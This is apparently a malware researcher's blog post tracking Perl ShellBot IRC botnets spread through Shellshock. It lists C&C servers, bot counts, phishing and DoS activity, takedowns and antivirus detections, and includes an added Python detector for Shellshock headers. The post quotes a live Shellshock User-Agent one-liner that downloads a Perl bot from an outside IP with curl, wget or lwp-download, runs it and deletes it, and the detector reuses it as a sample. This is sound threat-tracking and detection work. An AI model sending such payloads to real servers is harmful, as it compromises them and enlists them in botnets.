Perl.Shellbot by Shellshock Bash Attack

My first script kiddie via a Shellshock bash attack, yesterday 🙂

Perl_ShellBot2

Leading to PHP.ShellBot – server 185.31.209.84

inetnum:        185.31.208.0 – 185.31.209.255
netname:        SIM-NETWORKS
descr:          SIM-Networks Professional Hosting Solutions
country:        DE
admin-c:        SD9104-RIPE
tech-c:         SD9104-RIPE
status:         ASSIGNED PA
mnt-by:         SIMNETWORKS-MNT
source:         RIPE # Filtered
mnt-routes:     SIMNETWORKS-MNT
mnt-domains:    SIMNETWORKS-MNT

Perl_ShellBot6

~713 clients; if they are all bots, that is not bad 🙂

Perl_ShellBot

Interesting bots:

Perl_ShellBot3

They seem to be Romanian.

Perl_ShellBot Perl_ShellBot7

The abuse desk made a move:

Perl_ShellBot4
and the IRCd has been taken down.

Perl_ShellBot5
They need to rebuild everything.

EDIT – 2014 September 28

Another one spotted yesterday:

94.102.63.238
~3000 bots:
94.102.63.238_ircd2 94.102.63.238_ircd

Today the channel is restricted; they have reached 3900 bots.
I think they have stopped populating this server.

94.102.63.238_ircd3

EDIT – September 30: zoom on two botnets' activities

Group 213.5.67.223

PerlShellBot_Phishing
Installing a shell in order to sell it:

PerlShellBot_Phishing4

PerlShellBot_Phishing5

but the main activity is phishing email:

PerlShellBot_Phishing3

The script gives spam capability:
PerlShellBot_Phishing6
PerlShellBot_Phishing9

Some phishing examples – they seem to be bank phishing:

PerlShellBot_Phishing8

PerlShellBot_Phishing7

A DoS group

Another group, from dl.directxex.net/dl/nice.png, also spreading via the Shellshock bash vulnerability:

PerlShellBot_DoS_init
which then downloads other scripts from ftp://37.59.68.12/pub/:

PerlShellBot_DoS_init2
PerlShellBot_DoS4

Connects to 37.59.68.5

PerlShellBot_DoS2

This group carries out DoS attacks.

PerlShellBot_DoS3

PerlShellBot_DoS5

EDIT – 2015 February 4

Still around, and the same actor.

Two attempts:

http://www.malekal.com/modsec/index.php?ip=209.236.133.201
http://www.malekal.com/modsec/index.php?ip=64.187.99.130

Two different scripts, but both connect to 46.4.83.92

inetnum: 46.4.83.64 – 46.4.83.95
netname: HETZNER-RZ14
descr: Hetzner Online AG
descr: Datacenter 14
country: DE
admin-c: HOAC1-RIPE
tech-c: HOAC1-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
mnt-lower: HOS-GUN
mnt-routes: HOS-GUN
source: RIPE # Filtered

Shellshock_IRC_script2 Shellshock_IRC_script


Around 700 bots on this server.

Shellshock_IRC Shellshock_IRC_channels2 Shellshock_IRC_channels


EDIT – 2015 December

Still around:

http://www.malekal.com/modsec/index.php?ip=69.12.70.34
http://www.malekal.com/modsec/index.php?ip=67.205.111.9

User-Agent: () { :;}; /bin/bash -c "cd /tmp;lwp-download -a http://188.138.69.229/gnu;curl -O http://188.138.69.229/gnu;wget http://188.138.69.229/gnu;perl /tmp/gnu*;perl gnu;rm -rf /tmp/gnu*"
X-Forwarded-For: 67.205.111.9
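The User-Agent above is the whole infection chain in one header: the `() { :;};` function-definition prefix that vulnerable bash versions parsed from any environment variable (CGI passes request headers as environment variables), followed by the commands that fetch the Perl bot with whichever downloader is installed, run it and delete it. The following is an added example, not code from the post or from the bot: a small Python triage helper that flags such headers in captured requests and pulls out the dropper URLs, hosts and tools so they can be pivoted on the way the post does with the C&C addresses. The request framing around the quoted User-Agent (method line, Host header, the benign request) is constructed for the example.

```python
import re
from urllib.parse import urlparse

# Heuristic for the Shellshock (CVE-2014-6271) trigger: a header value that
# opens a bash function definition "() { ... }" and then carries trailing
# commands after the closing brace, which vulnerable bash versions executed
# when importing the environment.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")
# URLs of the payloads the trailing commands fetch; stop at shell separators.
URL_RE = re.compile(r"(?:https?|ftp)://[^\s\"';|&]+")
# Downloaders and interpreters commonly seen in these one-liners.
TOOL_RE = re.compile(r"\b(wget|curl|lwp-download|fetch|perl|python|php|bash|sh)\b")


def parse_headers(raw):
    """Split raw 'Name: value' request lines into a dict with lower-cased
    names. Lines without a colon (the request line) are ignored."""
    headers = {}
    for line in raw.splitlines():
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def analyze_request(raw):
    """Return one finding per header carrying a Shellshock payload, with the
    dropper URLs, their hosts and the tools invoked, plus the X-Forwarded-For
    value if a proxy recorded the real source."""
    headers = parse_headers(raw)
    findings = []
    for name, value in headers.items():
        if not SHELLSHOCK_RE.search(value):
            continue
        urls = sorted(set(URL_RE.findall(value)))
        findings.append({
            "header": name,
            "urls": urls,
            "hosts": sorted({urlparse(u).hostname for u in urls}),
            "tools": sorted(set(TOOL_RE.findall(value))),
            "x_forwarded_for": headers.get("x-forwarded-for"),
        })
    return findings


# Constructed sample: the User-Agent and X-Forwarded-For are the ones quoted
# in the post; the request line and Host header are made up for the example.
MALICIOUS_REQUEST = "\n".join([
    "GET / HTTP/1.1",
    "Host: www.example.org",
    'User-Agent: () { :;}; /bin/bash -c "cd /tmp;lwp-download -a http://188.138.69.229/gnu;'
    'curl -O http://188.138.69.229/gnu;wget http://188.138.69.229/gnu;perl /tmp/gnu*;perl gnu;rm -rf /tmp/gnu*"',
    "X-Forwarded-For: 67.205.111.9",
])

# Constructed benign request: parentheses in a normal User-Agent must not fire.
BENIGN_REQUEST = "\n".join([
    "GET /index.php HTTP/1.1",
    "Host: www.example.org",
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0",
])

if __name__ == "__main__":
    for finding in analyze_request(MALICIOUS_REQUEST):
        print(finding)
    print("benign findings:", analyze_request(BENIGN_REQUEST))
```

The regex is deliberately a little wider than the exact `() { :;};` string, since the body between the braces was varied by other campaigns; the hosts list is what you would hand to a blocklist or an abuse desk, and the tools list tells you which downloaders the actor expects on the victim.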

The IRCd C&C is at 46.4.132.212
JB_Backdoor_Perl
JB_Backdoor_Perl_2

He is running a phishing campaign against a Spanish bank, "laCaixa".

JB_Backdoor_Perl_phishing


JB_Backdoor_Perl_phishing_2


JB_Backdoor_Perl_phishing_3

EDIT – January 2016

Still around, at iweb/privatedns, but no reply from the abuse desk.
https://twitter.com/malekal_morte/status/673105128757575680
https://twitter.com/malekal_morte/status/565176780869599233

JB_23.95.6.90

Still phishing:

JB_spam

EDIT: JB is using a backdoor to keep control of the bots if the IRCd is taken down.
Dr.WEB does not detect this one, so Plesk is not protected; I will try to get them to add it: https://twitter.com/malekal_morte/status/690597750614953984
I already submitted this backdoor some weeks ago; detection is now 12/54 on VirusTotal.

SHA256: e0b86ff4e89e1a24ae894c71b9d6e30fa1097676c8ef46cede50ab40e34d16d4
File name: b.pl
Detection ratio: 12 / 54
Analysis date: 2016-01-25 08:42:51 UTC (2 minutes ago)
Antivirus Result Update
Agnitum Perl.Shellbot.T 20160124
Avast PHP:Agent-AO [Trj] 20160125
ClamAV Trojan.Perlscript 20160125
ESET-NOD32 Perl/Small.L 20160125
GData Script.Trojan.Agent.V6OX3T 20160125
Ikarus Trojan.Perl.Small 20160125
McAfee Perl/Generic Backdoor.a 20160125
McAfee-GW-Edition Perl/Generic Backdoor.a 20160125
Microsoft Backdoor:Perl/Small.B 20160125
NANO-Antivirus Trojan.Script.Agent.bowhye 20160125
Qihoo-360 Script/Trojan.25f 20160125
Sophos Troj/CBShell-A 20160125

JB_backdoor
Got some IRCd takedowns; now fully in Russia:

62.109.19.113 62.109.19.114

and lost around ~200 bots; it now seems hard for him to reach 500 bots.

JB_botnet_500_bots
